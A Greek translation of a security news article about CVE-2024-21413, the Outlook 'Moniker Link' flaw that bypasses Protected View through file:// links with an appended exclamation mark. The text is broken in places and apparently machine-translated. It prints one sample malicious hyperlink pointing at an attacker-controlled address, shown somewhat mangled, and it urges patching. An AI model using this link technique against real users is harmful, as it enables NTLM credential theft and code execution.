Η Microsoft ενημέρωσε σήμερα μια συμβουλή ασφαλείας για να προειδοποιήσει ότι ένα κρίσιμο σφάλμα του Outlook έγινε αντικείμενο εκμετάλλευσης σε επιθέσεις ως μηδενική ημέρα πριν διορθωθεί κατά τη διάρκεια της Τρίτης
ενημέρωση
ς κώδικα αυτού του μήνα.
Ανακαλύφθηκε από τον ερευνητή ευπάθειας του Check Point, Haifei Li και παρακολουθήθηκε ως
CVE-2024-21413
αυτή η ευπάθεια οδηγεί σε απομακρυσμένη εκτέλεση κώδικα (RCE) κατά το άνοιγμα μηνυμάτων ηλεκτρονικού ταχυδρομείου με κακόβουλους συνδέσμους χρησιμοποιώντας μια ευάλωτη έκδοση του Microsoft Outlook.
Αυτό συμβαίνει επειδή το ελάττωμα επιτρέπει επίσης στους εισβολείς να παρακάμψουν την Προστατευμένη προβολή (που έχει σχεδιαστεί για να αποκλείει επιβλαβές περιεχόμενο που είναι ενσωματωμένο σε αρχεία του
Office
ανοίγοντάς τα σε λειτουργία μόνο για ανάγνωση) και να ανοίγει κακόβουλα αρχεία του Office σε λειτουργία επεξεργασίας.
Ο Redmond προειδοποίησε επίσης ότι το παράθυρο προ
επισκόπηση
ς είναι ένας φορέας επίθεσης για αυτό το ελάττωμα ασφαλείας, επιτρέποντας την επιτυχή εκμετάλλευση ακόμη και κατά την προεπισκόπηση των κακόβουλα δημιουργημένων εγγράφων του Office στην Εξερεύνηση των
Windows
.
Οι μη επαληθευμένοι εισβολείς μπορούν να εκμεταλλευτούν το CVE-2024-21413 εξ αποστάσεως σε επιθέσεις χαμηλής πολυπλοκότητας που δεν απαιτούν αλληλεπίδραση με τον χρήστη.
“Ένας εισβολέας που εκμεταλλεύτηκε επιτυχώς αυτήν την ευπάθεια θα μπορούσε να αποκτήσει υψηλά προνόμια, τα οποία περιλαμβάνουν λειτουργίες ανάγνωσης, εγγραφής και διαγραφής”, η Microsoft
εξηγεί
.
“Ένας εισβολέας θα μπορούσε να δημιουργήσει έναν κακόβουλο σύνδεσμο που παρακάμπτει το Πρωτόκολλο Προστατευμένης Προβολής, το οποίο οδηγεί στη διαρροή των τοπικών πληροφοριών διαπιστευτηρίων NTLM και στην απομακρυσμένη εκτέλεση κώδικα (RCE).”
Το CVE-2024-21413 επηρεάζει πολλά προϊόντα του Office, συμπεριλαμβανομένων των Microsoft Office LTSC 2021 και Microsoft 365
Apps
for Enterprise, καθώς και του Microsoft Outlook 2016 και του Microsoft Office 2019 (υπό εκτεταμένη υποστήριξη).
Θαυμαστικό για παράκαμψη προστασίας του Outlook
Όπως εξηγείται από το Check Point σε έκθεση που δημοσιεύτηκε σήμερα, η ευπάθεια που μεταγλώττισε
Moniker Link
επιτρέπει στους εισβολείς να παρακάμπτουν τις ενσωματωμένες προστασίες του Outlook για κακόβουλους συνδέσμους που είναι ενσωματωμένοι σε μηνύματα ηλεκτρονικού ταχυδρομείου χρησιμοποιώντας το πρωτόκολλο file:// και προσθέτοντας ένα θαυμαστικό σε διευθύνσεις URL που οδηγούν σε διακομιστές που ελέγχονται από τους εισβολείς.
Το θαυμαστικό προστίθεται αμέσως μετά την επέκταση του εγγράφου, μαζί με κάποιο τυχαίο κείμενο (στο παράδειγμά τους, το Check Point χρησιμοποίησε “κάτι”), όπως φαίνεται παρακάτω:
*<a href="https://www.bleepingcomputer.com/news/security/microsoft-new-critical-outlook-rce-bug-exploited-as-zero-day/file:///10.10.111.111testtest.rtf!something">CLICK ME</a>*
Αυτός ο τύπος υπερ-σύνδεσης παρακάμπτει τον περιορισμό ασφαλείας του Outlook και το Outlook θα αποκτήσει πρόσβαση στον απομακρυσμένο πόρο “\10.10.111.111testtest.rtf” όταν γίνει κλικ στη σύνδεση χωρίς προειδοποιήσεις ή σφάλματα.
Το ελάττωμα παρουσιάστηκε λόγω του μη ασφαλούς API του MkParseDisplayName, επομένως η ευπάθεια μπορεί επίσης να επηρεάσει άλλο λογισμικό που το χρησιμοποιεί.
Ο αντίκτυπος των επιθέσεων που εκμεταλλεύονται με επιτυχία το CVE-2024-21413 περιλαμβάνει κλοπή πληροφοριών διαπιστευτηρίων NTLM, αυθαίρετη εκτέλεση κώδικα μέσω κακόβουλα δημιουργημένων εγγράφων του Office,
“Επιβεβαιώσαμε αυτό το #MonikerLink bug/attack vector στα πιο πρόσφατα περιβάλλοντα Windows 10/11 + Microsoft 365 (Office 2021).”
Το Check Point είπε
.
“Πιθανόν να επηρεαστούν και άλλες εκδόσεις/εκδόσεις του Office. Στην πραγματικότητα, πιστεύουμε ότι αυτό είναι ένα ζήτημα που αγνοήθηκε στο οικοσύστημα Windows/COM για δεκαετίες, καθώς βρίσκεται στον πυρήνα των API COM. Συνιστούμε ανεπιφύλακτα σε όλους τους χρήστες του Outlook εφαρμόστε το επίσημο έμπλαστρο το συντομότερο δυνατό.”
Ένας εκπρόσωπος της Microsoft δεν ήταν άμεσα διαθέσιμος όταν η BleepingComputer ζήτησε περισσότερες λεπτομέρειες σχετικά με την εκμετάλλευση του CVE-2024-21413 στη φύση.
VIA:
bleepingcomputer.com
